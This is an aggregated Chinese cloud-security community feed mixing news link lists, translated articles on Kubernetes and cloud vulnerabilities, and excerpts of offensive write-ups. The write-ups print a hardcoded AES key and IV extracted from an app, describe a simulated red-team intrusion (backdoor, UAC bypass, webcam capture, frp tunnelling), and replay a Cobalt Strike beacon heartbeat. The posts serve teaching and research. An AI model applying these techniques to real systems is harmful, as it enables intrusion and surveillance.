当前节点:huoxian
时间节点
2022年9月30日 17:01火线zone
本文为译文,原文链接:https://www.conjur.org/blog/cloud-native-iam-eks-secrets-management-for-kubernetes/
Kubernetes 是用于容器化应用程序的出色编排工具,Amazon 的 Elastic Kubernetes Service (EKS) 提供了一种在云中创建可扩展 Kubernetes 集群的简单方法。
但是,使用内置的 Kubernetes 机密管理工具保护容器的安全性可能在规模上具有挑战性。这就是 Conjur 介入以提供一种安全的方式来集中存储您的应用程序机密,以及在您的集群中设置和执行访问策略的地方。
一些最大的安全问题,尤其是在 Web应用程序安全风险中(请参阅OWASP 十大 Web 应用程序安全风险以获得更多信息),包括敏感数据暴露和安全配置错误。对于大型集群,可能会暴露您的机密或数据的代码和容器需要采用集中式方法。Conjur 通过提供身份验证器来验证应用程序(他们声称自己是谁?)和基于角色的访问控制 (RBAC)来授权对资源的访问(是否允许访问?),从而帮助降低这些风险。
为此,Conjur 提供了一个开箱即用的身份验证器,可让您将角色映射到预配置的身份。这允许您将 EKS pod 分配给特定角色(请参阅Amazon EKS 添加支持以将 IAM 权限分配给 Kubernetes 服务账户),Conjur 利用该功能自动为该 pod 提供与该角色关联的密钥。
让我们看一下如何设置 Conjur 来管理使用 EKS 并连接到 AWS Redshift 的简单容器化应用程序的机密。
设置和先决条件
在我们了解如何使用 Conjur 管理 EKS 集群的机密之前,让我们先了解一些设置先决条件。首先,我们需要从 AWS 的角度准备并设置以下内容:
具有一些备用资源的 AWS EKS 集群,用于运行 Java 应用程序节点。
提供了一些数据的 Amazon Redshift 数据仓库。
Conjur 已安装并正在运行。我正在使用使用 Docker 安装的 Conjur 的简单快速启动安装,如Cyberark/conjur-quickstart GitHub 存储库中所述。
一旦我们建立了我们的基本构建块,我们还需要在我们的 Redshift 仓库上创建一个用户来允许我们的应用程序访问它。在我的例子中,我在一个名为
2022年9月30日 13:01火线zone
使用自定义云容器在 Azure Functions 中增强云安全性
https://www.trendmicro.com/en_us/research/22/i/stronger-cloud-security-in-azure-function-using-custom-cloud-container.html
使用 Kubescape 和 kube-bench 保护 Kubernetes 集群
https://zone.huoxian.cn/d/2586-kubescape-kube-bench-kubernetes
云安全趋势:是什么让云基础设施容易受到威胁?
https://www.helpnetsecurity.com/2022/09/29/cloud-security-trends-cloud-infrastructure-threats-video/
您的云安全供应商可以帮助您升级吗?
https://www.lacework.com/blog/can-your-cloud-security-vendor-help-you-level-up/
您的云安全解决方案失败的警告信号
https://sonraisecurity.com/blog/warning-signs-your-cloud-security-solution-is-failing/
限制对 Elasticsearch / Opensearch 服务的访问
https://kloudle.com/academy/restricting-access-to-elasticsearch-opensearch-service
大多数组织在去年发生了与云相关的安全事件
https://www.scmagazine.com/news/cloud-security/most-organizations-had-a-cloud-related-security-incident-in-the-last-year
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月29日 18:31火线zone
本文为译文,原文地址:https://www.cncf.io/blog/2022/09/09/securing-kubernetes-cluster-using-kubescape-and-kube-bench/。
随着企业采用云原生技术,Kubernetes 已成为容器编排的主要选择工具。部署和管理应用程序从未如此简单。然而,保护集群就像使用容器的未知水域一样。攻击者发现并利用新的方法来侵入系统,而社区则全天候工作以保护它。
为了提高集群的安全性,需要了解它是什么以及它是如何工作的。为此,需要对集群进行详细分析,包括存储 Kubernetes 组件配置的文件系统,逐行分析工件等。NSA、MITRE、CIS 等机构发布基准并不断升级维护 Kubernetes 集群的安全性。然而,这些基准测试涵盖了如此多的细节,以至于手动检查成为一个非常漫长的过程。
在探索如何为 Kubernetes 集群设置漏洞评估扫描时,我们遇到了两个工具:kube-bench 和 Kubescape。
在这篇博文中,我们将讨论这些工具的开源产品、它们的功能、它们如何工作、它们使用哪些框架、何时使用它们以及为什么使用它们,以及它们如何相互补充。那么,让我们开始吧。
什么是 kube-bench?
kube-bench 是来自 Aqua Security的工具。它是一个开源产品,可根据 Internet 安全中心指南分析集群。
kube-bench 是如何工作的?
kube-bench 是一个不会在集群上连续运行的工具。相反,可以使用简单的命令在所有节点上运行它。测试分为不同的部分,例如:
主节点安全配置
etcd 节点配置
控制平面配置
工作节点安全配置
Kubernetes 政策
每个部分都会发布自己的测试、对失败或警告的测试的补救措施,以及它的摘要(PASS/FAIL/WARN/INFO 检查的计数)。最后,将发布总体摘要。以下是 minikube 集群上的 kube-bench 扫描输出的一些小片段:
检查示例
[INFO] 1 Master Node Security Configuration [INFO] 1.1 Master Node Configuration Files [FAIL] 1.1.1 Ensure that the API server pod specification file permissions are
2022年9月29日 12:01火线zone
Azure攻击路径
https://zone.huoxian.cn/d/2580-azure
红队视角下的 AWS 横向移动
https://mp.weixin.qq.com/s/Q0iiRJ53BwuU4LHynR4qWQ
Sysdig 报告揭示了容器安全漏洞的真实成本
https://containerjournal.com/features/sysdig-report-reveals-true-cost-of-container-security-breaches/
Aqua、HashiCorp 启用云原生安全、零信任方法
https://blog.aquasec.com/aqua-and-hashicorp-in-partnership-enabling-cloud-native-security-and-zero-trust-approaches
Sysdig 2022 威胁报告:云原生威胁正在增加和成熟
https://sysdig.com/blog/2022-sysdig-cloud-native-threat-report/
应用安全与云安全 101:模糊云原生应用层之间的界限
https://bridgecrew.io/blog/application-infrastructure-security-101-blurring-cloud-native-app-layers/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月28日 16:31火线zone
如何使用开源满足 24 个 Google Cloud Platform (GCP) 安全最佳实践
https://sysdig.com/blog/gcp-security-best-practices/
公共和私有 VPC 和子网(路由表)
https://medium.com/cloud-security/public-and-private-vpcs-and-subnets-route-tables-73b0fd78caa7
由于云配置错误,Optus 面临 100 万美元的赎金
https://sonraisecurity.com/blog/optus-faces-1million-ransom-due-to-cloud-misconfiguration/
FBI 帮助澳大利亚当局调查大规模 Optus 数据泄露:报告
https://www.darkreading.com/attacks-breaches/fbi-helping-australian-authorities-investigate-massive-optus-data-breach-reports
微软为 Azure 虚拟桌面推出无密码登录
https://www.darkreading.com/cloud/microsoft-passwordless-sign-on-azure-virtual-desktop
我可以用 Azure AD 替换 Active Directory 吗?不,这就是原因
https://jumpcloud.com/blog/can-i-replace-ad-with-azure-ad
开发人员如何保护他们 serverless 环境
https://www.contrastsecurity.com/security-influencers/how-developers-can-secure-their-serverless-environments
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月28日 14:31火线zone
1.抓包
1.这里我直接修改系统代理,有条件可以使用Shadowrocket,抓包工具为Charles
登录抓包获取特征POST请求头URL和参数,抓包获取的信息都可以作为切入点(url、header、body、response...)
可以看到phone为明文,pwd进行了加密也具备sign,当然此篇文章重点不在分析sign,后续说有另一篇文章专门分析sign配合Burp进行渗透测试
这里根据密文类型可以猜测出来应该是使用的AES、DES、3DES、RSA等
2.分析
1.砸壳 2.IDA加载二进制文件 3.等待二进制文件加载完成后在开始分析
拖入ida分析,然后Shift+F12打开IDA字符串窗口搜索关键字参数然后双击进去
再双击进去, 看到aGrantauthLogin选中按X查看交叉引用的位置进行跟踪
看到cfstr_GrantauthLogin选中按X查看交叉引用的位置进行跟踪
进入图形视图界面F5查看伪代码
伪代码窗口中,我们稍微翻找一下就看到一个类方法调用的参数Key+[SecurityManager AES256StringEncrypt:key:],里面放着常量CFSTR("rkKbcCa3nxY8YwAWUpu2PwUcMgSFwL2r"));
双击AES256StringEncrypt类方法中,可以看到IV为BYfmvhVjpPwUcMgS
这里使用在线解密网站查看,明文内容和输入内容已一致(挺惊讶的 没想到这么快)
2022年9月28日 11:31火线zone
本文为翻译文章,原文地址:https://cloudbrothers.info/azure-attack-paths/
创建和维护一个安全的环境是困难的。随着每一项技术或产品添加到您的环境中,它变得更加复杂。微软Azure作为一个云环境也不例外,随着每年增加的许多服务和特性,即使你不做任何改变,它也会变得更加复杂。因为在迁移到云上时,保持IT资产的安全非常重要,所以了解应该避免哪些不良实践以及存在哪些攻击场景非常重要。
在这篇博客文章中,我想介绍一下Azure环境中已知的攻击路径。这种攻击对许多人来说并不新鲜,在撰写本文时,我依赖于其他IT安全专业人员的公开研究。就像使用内部活动目录一样,我认为让这些信息尽可能容易访问是很重要的。展示不同的服务和权限如何导致脆弱的环境是关键,将所有这些信息放在一个地方是一个良好的开始。
由于攻击图有助于减轻一些复杂性,所以我基于这个模型概述了不同的攻击路径。
根据已发表的关于每种攻击路径的工作中包含的信息,我将我的文章限制为一个简短的攻击描述,您将不得不阅读原始文章以获得基本细节和深入解释。我不想只是复制原作者的作品,而是为所有人创造一个起点。
Azure攻击路径图
Azure Lighthouse
攻击描述
Azure Lighthouse本身就是一种管理其他租户资源的合法方式。但是攻击者可以欺骗管理员或使用劫持的帐户接受委托的权限请求。

为了实现这一点,攻击者创建一个带有所需角色定义的自定义模板。注意,不能使用Owner或任何具有DataActions权限的内置角色。
生成的模板必须部署在目标租户中。每个订阅都需要单独部署。攻击者可以使用Azure Policy以自动化的方式部署它。
部署完成后,攻击者可以从自己的租户访问目标租户订阅中的资源。因为攻击者拥有Contributor访问权限,所以像Invoke-AzVMRunCommand这样的攻击路径是可能的。
从攻击者的角度来看,您可以在Azure Portal的各个刀片中查看您的客户。
攻击路径
描述
原来的部署是可见的,但也可以从订阅中的部署部分中删除。
检测这种攻击的更好方法是检查Microsoft.ManagedServices注册的意外分配。检查搜索查询。
在目标租户中,您还可以通过 PowerShell 或在Azure 门户中检查当前处于活动状态的服务产品。
Get-AzManagedServicesDefin
2022年9月27日 14:31火线zone
网络研讨会回顾:不断变化的云需要动态安全
https://sonraisecurity.com/blog/webinar-recap-continuously-changing-clouds-need-dynamic-security/
7 张图入门 Hadoop 在 K8S 环境中部署
https://mp.weixin.qq.com/s/tT44pBkGhL5e2geJN6IgYw
Azure Active Directory 如何打开新的身份验证风险
https://www.csoonline.com/article/3672531/how-azure-active-directory-opens-new-authentication-risks.html
阿里云公布国际业务战略路线图
https://www.cloudcomputing-news.net/news/2022/sep/26/alibaba-cloud-unveils-strategic-roadmap-for-international-business/
英国最大的健康研究计划选择微软云
https://www.cloudcomputing-news.net/news/2022/sep/23/uks-largest-health-research-programme-chooses-microsoft-cloud/
云原生应用保护平台:最佳实践
https://www.scmagazine.com/resource/cloud-security/cloud-native-app-protection-platforms-best-practices
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月27日 12:31火线zone
此文章为客户单位要求进行应急演练,因此按客户要求进行演习,文章较水,大佬请勿喷,谢谢,
文中内容,均属虚构,仅供学习使用,请勿进行真实攻击
描述
模拟对客户内部办公网络进行攻击,通过各种手段,将后门文件传入客户的电脑中,其中有几个关键因素:
后门文件需要过杀软(此处不涉及,不会免杀,明面上见到的免杀工具尝试了很多,被自己虚拟机360、奇安信、火绒都给干死了)
客户电脑必须双网卡,即既可以通内部办公网络,又可以通外部互联网,(这种网络结构其实在很多企业都会存在,我能想到的可以有两种办法达到这种网络结构:
第一种:使用两张网卡,电脑网卡1接互联网网络,电网网卡2接内部办公网络,(例如笔记本可以有无线网卡连接WiFi,有线网卡连接内网)如下图:

第二种:配置静态IP,通过各种安全设备,默认禁止所有网络的对外连接,同时仅放通此静态IP对内网和外部互联网的访问,例如在防火墙上设置所有默认禁止,再单独开放优先策略放通此网络,如下图:

后门程序必须被执行
以上条件属实苛刻,所以真实环境实现几率比较小。
满足以上条件后,通过植入后门的这台PC作为跳板,搭建隧道,利用隧道进行内网的横向扫描攻击,如下图:

满足以上条件后就开始我们的攻击之路
攻击
后门程序运行

VPS上服务端接收到上线通知

查看权限,非管理员权限,需要进行提权

使用自带提权工具进行(WindowsUAC绕过)

目前已经可以进行屏幕截图,获取客户PC,同时可以调取摄像头拍照,由于客户桌面有重要文件,因此不做真实图片展示,拍照内容已打码


提权之后,需要进行隧道搭建,在这里使用frp工具进行搭建Socks5的隧道搭建(当然除了frp,还可以使用其他隧道搭建方法,下次进行补充),因此需要进行frp工具下载,在VPS中使用Python启用http服务,使用Windows自带工具进行

python -m SimpleHTTPServer //python2启动http服务


运行frpc程序,建立Socks5隧道

攻击机运行Proxifier,配置Socks5代理,攻击平台查看内网另一网段,同时添加内网路由


使用工具,扫描内网网段,发现机器多个在线机器,且开放了SMB,具体还未探测,(在真实环境中,没有去使用SMB漏洞攻击,因为知道内网机器好多都是好几年的老机器,肯定会存在漏洞的,因此没有再做攻击,想通过简单的爆破出发安全终端的告警,先尝试进行直接远
2022年9月26日 15:31火线zone
火线安全——云端火线上的安全
https://mp.weixin.qq.com/s/4qGWcqkZA68bnyus8eM2hg
AttachMe: 关键的 OCI 漏洞,允许未经授权访问客户云存储卷
https://zone.huoxian.cn/d/2576-attachmeoci
AWS IAM 身份中心访问令牌以明文形式存储,不,这不是严重漏洞
https://itnext.io/aws-iam-identity-center-access-tokens-are-stored-in-clear-text-and-no-thats-not-a-critical-68a48c1e398
工具发布 – Kubescout 项目:为 Scout Suite 添加 Kubernetes 支持
https://research.nccgroup.com/2022/09/22/tool-release-project-kubescout-adding-kubernetes-support-to-scout-suite/
Azure 攻击路径
https://cloudbrothers.info/azure-attack-paths/
实施 DevSecOps 以保护您的 CI/CD 管道
https://www.infracloud.io/blogs/implement-devsecops-secure-ci-cd-pipeline/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月26日 14:31火线zone
针对CS最新XSS漏洞的详细研究--CVE-2022-39197
文章仅用于学习交流,请勿利用文章中的技术对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
1. 原理部分
1.1 CS上线流量
本地主机(vm8网卡): windows11 192.168.52.1
服务端: windows10 192.168.52.129
被控端: windows10 192.168.52.140
首先生成一个裸奔马,然后在被控端打开wireshark并且点击exe上线,我们这里只考虑应用层的包,所以过滤一下,我这里得到4个包
前两个先不看,先看3和4,他们比较亲民点,追踪流发现cookie中存在一个加密过后的值,而凭借经验不难看出很大可能是RSA非对称加密,猜想这个就是上线的请求了(也就是心跳包)
为了验证猜想,我用本地主机利用python发出该请求代码如下(这里为了书写方便附加个hearder转字典地址:公众号后回复“header转字典”即可)
import requests import time url = 'http://192.168.52.128/fwlink' header = { "Cookie":"OphJmHM6fR6cjpj4DMdsF3epxwniVsGao14/2a2WmqR0EoEqKdrz92bfuNUurfO1m2NGY/YgEp6tiaZr1JpVaUa2mGYPjEJCiLxBj13VGk31G4E6uI5bG5EPvM4RjWUMZnrlfJiWNGygdJGeH9mpXz40zPFT1VjWd49Wf0QKZog=", "User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)", "Host":"192.168.52.128", "Connection":"Keep-Alive", "Cache-Control":"no-cache" } while True: requests.get(url,headers=header) time.sleep(10)
可以看到达到效果了
当然我们这里想获得类似的信息也可以通过我们上图中第一个请求OwQF来拿Stage分析出来,这里可以用大佬的工具
https://github
2022年9月23日 18:31火线zone
本文为译文,原文地址:https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access
在打补丁之前,#AttachMe可能允许攻击者未经授权访问和修改任何其他用户的OCI存储卷,从而违反云隔离。在披露后,Oracle在数小时内修复了该漏洞。不需要客户操作。
今年6月,Wiz工程师发现并报告了#AttachMe,这是Oracle云基础设施(OCI)中的一个主要云隔离漏洞,促使Oracle在数小时内修补该漏洞,而不需要客户采取行动。
潜在影响——在打补丁之前,OCI的所有客户都可能成为了解#AttachMe的攻击者的目标。只要攻击者拥有Oracle Cloud Identifier (cid),就可以对任何未附加的存储卷或允许多附件的附加存储卷进行读写,从而允许敏感数据被窃取或通过可执行文件操作发起更具破坏性的攻击。
补救——在接到Wiz通知的24小时内,Oracle为所有OCI客户打了#AttachMe补丁。不需要客户操作。
关键结论——云租户隔离是云中的一个关键元素。客户希望他们的数据不能被其他客户访问。然而,云隔离漏洞打破了租户之间的隔离墙。这突出了积极主动的云漏洞研究、负责任的披露和公开跟踪云漏洞对云安全的至关重要性。
什么是AttachMe?
#AttachMe是报告的最严重的云漏洞之一,因为它可能会影响所有OCI客户。云隔离漏洞通常会影响特定的云服务。然而,在本例中,影响与核心云服务相关。
Wiz工程师发现,用另一个帐户将磁盘绑定到虚拟机不需要任何权限。这意味着潜在的攻击者可以访问和修改来自任何OCI客户的数据,在某些情况下甚至可以接管环境。
潜在的攻击流程很简单:
1、通过搜索web或使用低特权用户权限从受害者的环境中读取卷的cid来发现目标受害者卷的ID (cid)。
2、在攻击者控制的租户中启动计算实例,该租户位于与目标卷相同的可用性域(AD)中。
3、将受害者的卷附加到攻击者的计算实例,从而获得对该卷的读/写权限。

从那里,一个潜在的攻击者可以执行许多严重的行动:
导出存储在卷上的敏感数据。
在卷中搜索明文机密,以便在受害者的环境中横向移动and/or升级特权。
修改现有的块卷和引导卷。通过操作二进制文件—以便在将卷挂载到计算实例上时获得代码执行。
2022年9月23日 17:01火线zone
Azure Cloud Shell 命令注入窃取用户的访问令牌
https://zone.huoxian.cn/d/2573-azure-cloud-shell
Docker 公司将整合免费的 SBOM 生成工具
https://containerjournal.com/features/docker-inc-to-integrate-free-sbom-generation-tool/
什么是图表技术?它能做什么?
https://blog.lightspin.io/graph-technology
围绕云原生应用保护平台的炒作是什么?
https://sonraisecurity.com/blog/cloud-native-application-protection-platforms/
ESG 分享有关 IaC 安全趋势的要点
https://www.lacework.com/blog/esg-shares-takeaways-on-iac-security-trends/
甲骨文出现可访问客户数据的云隔离漏洞,现已修复
https://www.infoq.cn/news/LXapis10RZeLMLDK2hsx
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月22日 15:01火线zone
多云是新常态,但也带来了关键的安全挑战
https://blog.radware.com/security/cloudsecurity/2022/09/multi-cloud-is-the-new-normal/
我们在调查后,看到了云安全挑战的严重性
https://securityboulevard.com/2022/09/survey-reveals-the-severity-of-cloud-security-challenge/
为什么制造业是云安全攻击的重灾区
https://securityboulevard.com/2022/09/why-manufacturing-struggles-with-cloud-security/
优先考虑你的容器镜像管道
https://www.lacework.com/blog/prioritizing-your-container-image-pipeline/
针对云计算服务环境下关键信息基础设施安全保障的思考
https://www.anquanke.com/post/id/280572
无服务器安全的复杂性
https://www.contrastsecurity.com/security-influencers/the-complexities-of-serverless-security-how-to-secure-serverless-applications-contrast-security
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月22日 12:31火线zone
本文为译文,原文链接https://blog.lightspin.io/azure-cloud-shell-command-injection-stealing-users-access-tokens
Azure Cloud Shell 是一种交互式、经过身份验证、浏览器可访问的 shell,用于管理 Azure 资源。 这篇文章描述了我如何接管 Azure Cloud Shell 受信任域并利用它在其他用户的终端中注入和执行命令。 使用执行的代码,我访问了终端附加的元数据服务,并获得了用户的访问令牌。 此访问令牌为攻击者提供受害者用户的 Azure 权限,并使他们能够代表其执行操作。
该漏洞已报告给 Microsoft,后者随后修复了该问题。
Cloud Shell 跨域通信
Cloud Shell控制台作为HTML iframe元素嵌入到Azure Portal中。

嵌入式iframe的源URL为:
https://ux.console.azure.com?region=westeurope&trustedAuthority=https%3A%2F%2Fportal.azure.com&l=en.en-us&feature.azureconsole=true
上面的URL中有两个有趣的地方需要注意:
1、嵌入式iframe的域是ux.console.azure.com,这与父窗口portal.azure.com的域不同。因为这是两个不同的源,所以它们之间应该有信任,可以通过JavaScript进行通信。
2、请求参数trustedAuthority可能是两个不同源之间这种信任的一部分。trustedAuthority参数的值是https://portal.azure.com,它与嵌入窗口的起源相匹配。
如果trustedAuthority参数在某种程度上是两个不同源之间信任的一部分,那么ux.console.azure.com应该使用它。让我们看一下ux.console.azure.com的JavaScript文件。

我将开始看main.js和搜索“trustedAuthority”。下图显示了匹配。
trustedAuthority请求参数值被分配给trustedParentOrigin变量。trustedParentOrigin变量稍后在isTrustedOrigin函数中用作起源检查的一部分。
is
2022年9月21日 16:02火线zone
Kubernetes 1.18 安装 Dashboard
https://zone.huoxian.cn/d/2568-kubernetes118dashboard
Azure Cloud Shell 命令注入窃取用户的访问令牌
https://blog.lightspin.io/azure-cloud-shell-command-injection-stealing-users-access-tokens
带你理解 Kubernetes Pod 被移除是什么意思
https://sysdig.com/blog/kubernetes-pod-evicted/
Serverless Devs 进入 CNCF 沙箱,成首个入选的 Serverless 工具项目!
https://mp.weixin.qq.com/s/ICVDO3U5Ea1DzP3LFJq8mQ
AttachMe:严重的 OCI 漏洞允许未经授权访问客户云存储卷
https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access
云中的第三方风险
https://securityboulevard.com/2022/09/third-party-risk-in-the-cloud/
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月21日 16:02火线zone
此文章为客户单位要求进行应急演练,因此按客户要求进行演习,文章较水,大佬请勿喷,谢谢,
文中内容,均属虚构,仅供学习使用,请勿进行真实攻击
描述
模拟对客户内部办公网络进行攻击,通过各种手段,将后门文件传入客户的电脑中,其中有几个关键因素:
后门文件需要过杀软(此处不涉及,不会免杀,明面上见到的免杀工具尝试了很多,被自己虚拟机360、奇安信、火绒都给干死了)
客户电脑必须双网卡,即既可以通内部办公网络,又可以通外部互联网,(这种网络结构其实在很多企业都会存在,我能想到的可以有两种办法达到这种网络结构:
第一种:使用两张网卡,电脑网卡1接互联网网络,电网网卡2接内部办公网络,(例如笔记本可以有无线网卡连接WiFi,有线网卡连接内网)如下图:

第二种:配置静态IP,通过各种安全设备,默认禁止所有网络的对外连接,同时仅放通此静态IP对内网和外部互联网的访问,例如在防火墙上设置所有默认禁止,再单独开放优先策略放通此网络,如下图:

后门程序必须被执行
以上条件属实苛刻,所以真实环境实现几率比较小。
满足以上条件后,通过植入后门的这台PC作为跳板,搭建隧道,利用隧道进行内网的横向扫描攻击,如下图:

满足以上条件后就开始我们的攻击之路
攻击
后门程序运行

VPS上服务端接收到上线通知

查看权限,非管理员权限,需要进行提权

使用自带提权工具进行(WindowsUAC绕过)

目前已经可以进行屏幕截图,获取客户PC,同时可以调取摄像头拍照,由于客户桌面有重要文件,因此不做真实图片展示,拍照内容已打码


提权之后,需要进行隧道搭建,在这里使用frp工具进行搭建Socks5的隧道搭建(当然除了frp,还可以使用其他隧道搭建方法,下次进行补充),因此需要进行frp工具下载,在VPS中使用Python启用http服务,使用Windows自带工具进行

python -m SimpleHTTPServer //python2启动http服务


运行frpc程序,建立Socks5隧道

攻击机运行Proxifier,配置Socks5代理,攻击平台查看内网另一网段,同时添加内网路由


使用工具,扫描内网网段,发现机器多个在线机器,且开放了SMB,具体还未探测,(在真实环境中,没有去使用SMB漏洞攻击,因为知道内网机器好多都是好几年的老机器,肯定会存在漏洞的,因此没有再做攻击,想通过简单的爆破出发安全终端的告警,先尝试进行直接远
2022年9月20日 15:32火线zone
Kubernetes 的 NSA 安全最佳实践
https://containerjournal.com/features/nsa-security-best-practices-for-kubernetes/
TeamTNT 瞄准存在错误配置的 kubelet
https://sysdig.com/blog/teamtnt-kubelet-credentials/
Docker:如何在不运行任何容器的情况下提取镜像文件系统
https://iximiuz.com/en/posts/docker-image-to-filesystem/
CSPM 的一些弊端
https://www.chrisfarris.com/post/cspm-tarpit/
云检测和响应:CDR 与 EDR 与 NDR 与 XDR
https://www.techtarget.com/searchsecurity/tip/Cloud-detection-and-response-CDR-vs-EDR-vs-NDR-vs-XDR
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月20日 15:01火线zone
目的
k8s的集群搭建已经完成,那么页面怎么管理呢?本文详细介绍k8s-dashboard页面管理。
安装
下载yaml文件
wget https://raw.githubusercontent.com/kubernetes/dashboard/v2.0.0/aio/deploy/recommended.yaml
修改配置
修改kubernetes-dashboard的service类型为NodePort类型,使用nodeport方式访问Dashboard 。
[root@k8s-master dashboard]# vim recommended.yaml ... kind: Service apiVersion: v1 metadata: labels: k8s-app: kubernetes-dashboard name: kubernetes-dashboard namespace: kubernetes-dashboard spec: type: NodePort # 新增 ports: - port: 443 targetPort: 8443 nodePort: 30443 # 新增 selector: k8s-app: kubernetes-dashboard
安装Dashboard
[root@k8s-master dashboard]# kubectl create -f recommended.yaml namespace/kubernetes-dashboard created serviceaccount/kubernetes-dashboard created service/kubernetes-dashboard created secret/kubernetes-dashboard-certs created secret/kubernetes-dashboard-csrf created secret/kubernetes-dashboard-key-holder created configmap/kubernetes-dashboard-settings created role.rbac.authorization.k8s.io/kubernetes-dashboard created clusterrole.rbac.authorization.k8s.io/kubern
2022年9月19日 15:31火线zone
什么是无代理扫描?我需要它吗?
https://blog.lightspin.io/cloud-security/agentless-scanning
Distroless 容器映像的内部内容:深入了解
https://iximiuz.com/en/posts/containers-distroless-images/
您的云安全实践如何支持在完全不同的成熟度级别上工作的团队
https://www.lacework.com/blog/how-your-cloud-security-practice-can-support-teams-working-at-wildly-different-maturity-levels/
IDSA 推出 CIEM 最佳实践
https://ermetic.com/blog/cloud/idsa-introduces-ciem-best-practices/
大型云服务提供商的高风险敞口减少
https://www.scmagazine.com/news/cloud-security/large-cloud-service-providers-saw-a-decrease-in-high-level-risk-exposure
Docker 镜像构建保姆级入门实战指南
https://mp.weixin.qq.com/s/5_TOeATF53x49xeuWEccBA
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月16日 15:01火线zone
威胁警报:TeamTNT 带来了云上新恶意软件
https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt
改善云安全状况的 5 种方法
https://www.techtarget.com/searchsecurity/opinion/5-ways-to-improve-your-cloud-security-posture
软件开发人员在云安全领域的崛起
https://bridgecrew.io/blog/rise-of-developers-in-cloud-security/
降低容器安全威胁
https://containerjournal.com/features/containing-container-security-threats/
TeamTNT 通过 15 万次恶意云镜像拉取 Docker 容器
https://www.darkreading.com/cloud/teamtnt-docker-containers-malicious-cloud-images
云安全专家预计严重数据泄露的风险会增加
https://www.cybersecuritydive.com/news/cloud-security-risks/631800/
如何限制对公共 Cloud SQL 数据库实例的访问
https://kloudle.com/academy/how-to-restrict-access-to-public-cloud-sql-database-instances
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月15日 15:26火线zone
快速检查 k8s 集群 pod 安全
https://zone.huoxian.cn/d/2559-k8spod
云安全架构——批处理作业
https://medium.com/cloud-security/cloud-security-architecture-batch-jobs-10f8b2f363c1
CloudFox 介绍
https://bishopfox.com/blog/introducing-cloudfox
KSPM 和如何改善你的 Kubernetes 安全
https://sysdig.com/blog/how-to-improve-your-kubernetes-security-posture-kspm/
企业如何应对云原生时代的安全挑战?
https://mp.weixin.qq.com/s/MGja5E24KuKixZWck7TRQw
CNAPP 解决的 5 大安全挑战
https://www.trendmicro.com/en_us/devops/22/i/cnapp-solved-security-challenges.html
IBM 表示,云中的过度特权是一个普遍问题
https://www.csoonline.com/article/3673750/excess-privilege-in-the-cloud-is-a-universal-problem-ibm-says.html
查看历史云安全技术资讯可以访问:
https://cloudsec.huoxian.cn/docs/information
2022年9月15日 12:04火线zone
php版本:
5.x
7.x
8.0
均不可以。
洞态版本:
最新拉取的github镜像。
部署方式:
利用docker成功部署。
本地下载的php-agent

1.复制 dongtai_php_agent.so 到 PHP 安装环境中的 extension 中:
这里把dongtai_php_agent.so复制到了phpstudy中的 E:\phpstudy_pro\Extensions\php\php7.3.4nts\ext 目录下面
2.dongtai-php-property.ini 放在 PHP 的配置文件夹中:
这里把dongtai-php-property.ini放在了php目录下面。

也进行了dongtai-php-property.ini 中修改 hook.json.path


dongtai-php-property.ini 中 extension=dongtai_php_agent 的注释已经去掉
但是php -m还是看不到 dongtai_php_agent
求助哪里的问题~~
2022年9月14日 17:34火线zone
本文为译文,原文网址为 https://www.cncf.io/blog/2022/09/06/the-2-minute-test-for-kubernetes-pod-security/
了解如何审核你的集群是否符合最新的Kubernetes Pod安全标准,而无需在集群中安装任何东西
在这篇文章中,将向你展示如何审计你的集群是否符合最新的Kubernetes Pod安全标准,而无需在集群中安装任何东西。
Pod是Kubernetes的基本执行单位,Pod的安全性对所有集群都是必要的。如果没有启用pod安全检查,任何有权限运行pod的用户都可以提升权限。攻击者可以利用pod安全性的缺乏来执行容器逃逸。所有集群,包括Dev/Test和staging集群,这些都是攻击者的常见入口,都应该实施pod安全。
Kubernetes项目发布了Pod安全标准,其中包含的安全控制分为三个配置文件级别,应该被强制执行。
Kubernetes v1.25为pod安全标准提供了in-tree addmiision controller,它提供命名空间级别的验证和执行,需要在API服务器上进行配置。 在大多数情况下,需要更细化的控制。Examining Pod Security Admission提供了一个很好的分析。
为了检查是否符合Kubernetes Pod安全标准,我们将从集群外部运行Kyverno CLI,并执行pod安全标准中定义的每个控制策略。为了执行审计,你将需要通过kubectl访问集群,但不需要在集群中安装任何东西。
Step 1: 安装 Krew、Kustomize
Krew是Kubectl(Kubernetes CLI)的一个软件包管理器。
Kustomize是kubectl的一个子命令,可以简化配置管理。由于与kubectl一起分发的版本往往是旧的,请查看这个链接来安装最新版本。
Step 2: 安装kubectl Kynerno插件
安装命令如下:
kubectl krew install kyverno
命令输出如下所示:
Updated the local copy of plugin index. Installing plugin: kyverno Installed plugin: kyverno \ | Use this plugin: | kubectl kyverno | Documenta
2022年9月14日 16:03火线zone
记录一次平平无奇的云上攻防过程
https://zone.huoxian.cn/d/2557
centos7使用kubeadm安装kubernetes集群
https://zone.huoxian.cn/d/2554-centos7kubeadmkubernetes
K8s 安全的未来之路:消除常设特权
https://containerjournal.com/features/the-way-forward-for-k8s-security-eliminate-standing-privileges/
什么是 SOC2 合规性?
https://blog.lightspin.io/what-is-soc2-compliance
攻击者想要您的身份并确切知道在哪里可以找到它
